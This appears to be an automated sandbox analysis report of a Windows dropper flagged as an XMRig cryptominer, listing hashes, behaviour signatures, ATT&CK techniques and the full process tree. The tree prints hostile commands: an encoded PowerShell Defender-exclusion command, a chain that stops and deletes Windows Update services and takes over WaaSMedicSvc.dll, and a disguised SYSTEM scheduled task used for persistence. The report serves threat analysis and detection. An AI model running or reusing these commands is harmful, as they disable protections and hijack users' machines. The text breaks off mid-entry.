Analysis

  • max time kernel
    300s
  • max time network
    301s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    28-06-2022 04:06

General

  • Target

    00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe

  • Size

    7.4MB

  • MD5

    360b1e11f8ab2a718f56a4fe23f9c846

  • SHA1

    4be3649ba2def716aa970e2b84b7e4b12215cf85

  • SHA256

    00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea

  • SHA512

    4b111c5116c8636e0d374abf83b489a4d04bb3eb71bd624051aaafeeb6f2cb41ae717fda875c51f558a957b811818729e51f32cfb391a8c5a99c23b3486c7795

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe
    "C:\Users\Admin\AppData\Local\Temp\00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4320
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:3092
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4176
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4836
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3524
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3832
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:3124
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:2960
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:3520
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:2388
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:3480
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:4056
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:3092
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:3084
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:4464
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:4448
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:2016
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:4584
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:2060
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:2820
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:4320
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
              5⤵
                PID:3888
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                5⤵
                  PID:3288
                • C:\Windows\system32\reg.exe
                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                  5⤵
                  • Modifies registry key
                  PID:1424
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:5088
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    5⤵
                    • Modifies registry key
                    PID:4544
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                    5⤵
                      PID:4584
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                      5⤵
                        PID:4040
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:924
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4356
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:648
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4532
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4848
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4844
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:3500
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:3712
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:2912
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:4844
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:4864
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Checks computer location settings
                          PID:4852
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:4540
                      • C:\Windows\system32\browser_broker.exe
                        C:\Windows\system32\browser_broker.exe -Embedding
                        1⤵
                        • Modifies Internet Explorer settings
                        PID:1064
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1792
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2512
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4744
                      • C:\Program Files\Chrome\updater.exe
                        "C:\Program Files\Chrome\updater.exe"
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:3520
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Drops file in Drivers directory
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4716
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
                            3⤵
                              PID:3620
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe jfkojmuoois1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                              3⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5068
                            • C:\Windows\System32\conhost.exe
                              C:\Windows\System32\conhost.exe
                              3⤵
                                PID:2912
                                • C:\Windows\System32\conhost.exe
                                  "C:\Windows\System32\conhost.exe" "lnftwwoznl"
                                  4⤵
                                    PID:3972
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                  3⤵
                                    PID:3548
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                    3⤵
                                      PID:3844
                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                  1⤵
                                    PID:4072
                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                    1⤵
                                    • Modifies registry class
                                    PID:4728
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
                                    1⤵
                                      PID:5068
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                      1⤵
                                      • Modifies registry key
                                      PID:4308
                                    • C:\Windows\system32\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                      1⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:4384
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                      1⤵
                                        PID:2192
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                        1⤵
                                          PID:3308
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                          1⤵
                                            PID:4320
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            1⤵
                                              PID:4240
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                              1⤵
                                                PID:1852
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                1⤵
                                                  PID:1560
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                  1⤵
                                                    PID:1424
                                                  • C:\Windows\system32\reg.exe
                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                    1⤵
                                                    • Modifies registry key
                                                    PID:3988
                                                  • C:\Windows\system32\reg.exe
                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                    1⤵
                                                    • Modifies registry key
                                                    PID:2032
                                                  • C:\Windows\system32\reg.exe
                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                    1⤵
                                                    • Modifies registry key
                                                    PID:3144
                                                  • C:\Windows\system32\reg.exe
                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                    1⤵
                                                    • Modifies registry key
                                                    PID:2452
                                                  • C:\Windows\system32\takeown.exe
                                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                    1⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:2768
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                    1⤵
                                                    • Modifies registry key
                                                    PID:2504
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                    1⤵
                                                    • Modifies registry key
                                                    PID:816
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                    1⤵
                                                    • Modifies registry key
                                                    PID:4352
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                    1⤵
                                                    • Modifies registry key
                                                    PID:1464
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop dosvc
                                                    1⤵
                                                    • Launches sc.exe
                                                    PID:2440
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop bits
                                                    1⤵
                                                    • Launches sc.exe
                                                    PID:2036
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-dc 0
                                                    1⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4680
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop wuauserv
                                                    1⤵
                                                    • Launches sc.exe
                                                    PID:2896
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-ac 0
                                                    1⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4532
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-dc 0
                                                    1⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:700
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop WaaSMedicSvc
                                                    1⤵
                                                    • Launches sc.exe
                                                    PID:3500
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-ac 0
                                                    1⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3228
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop UsoSvc
                                                    1⤵
                                                    • Launches sc.exe
                                                    PID:3832

                                                  Network

                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                  Execution

                                                  Scheduled Task

                                                  1
                                                  T1053

                                                  Persistence

                                                  Modify Existing Service

                                                  2
                                                  T1031

                                                  Scheduled Task

                                                  1
                                                  T1053

                                                  Privilege Escalation

                                                  Scheduled Task

                                                  1
                                                  T1053

                                                  Defense Evasion

                                                  Modify Registry

                                                  3
                                                  T1112

                                                  Virtualization/Sandbox Evasion

                                                  1
                                                  T1497

                                                  Impair Defenses

                                                  1
                                                  T1562

                                                  File Permissions Modification

                                                  1
                                                  T1222

                                                  Discovery

                                                  Query Registry

                                                  3
                                                  T1012

                                                  Virtualization/Sandbox Evasion

                                                  1
                                                  T1497

                                                  System Information Discovery

                                                  4
                                                  T1082

                                                  Impact

                                                  Service Stop

                                                  1
                                                  T1489

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Program Files\Chrome\updater.exe
                                                    Filesize

                                                    7.2MB

                                                    MD5

                                                    34114ac92707af5ed0825e37be5e7fb0

                                                    SHA1

                                                    0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                    SHA256

                                                    9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                    SHA512

                                                    44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                  • C:\Program Files\Chrome\updater.exe
                                                    Filesize

                                                    7.2MB

                                                    MD5

                                                    34114ac92707af5ed0825e37be5e7fb0

                                                    SHA1

                                                    0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                    SHA256

                                                    9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                    SHA512

                                                    44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                  • C:\Windows\Temp\lol.bat
                                                    Filesize

                                                    59B

                                                    MD5

                                                    f580e0e80cc87b25e38ea2c0c8059d04

                                                    SHA1

                                                    299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                    SHA256

                                                    9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                    SHA512

                                                    5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                  • C:\Windows\Temp\run.bat
                                                    Filesize

                                                    98B

                                                    MD5

                                                    731afe244b2414169a5f630d52646e56

                                                    SHA1

                                                    e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                    SHA256

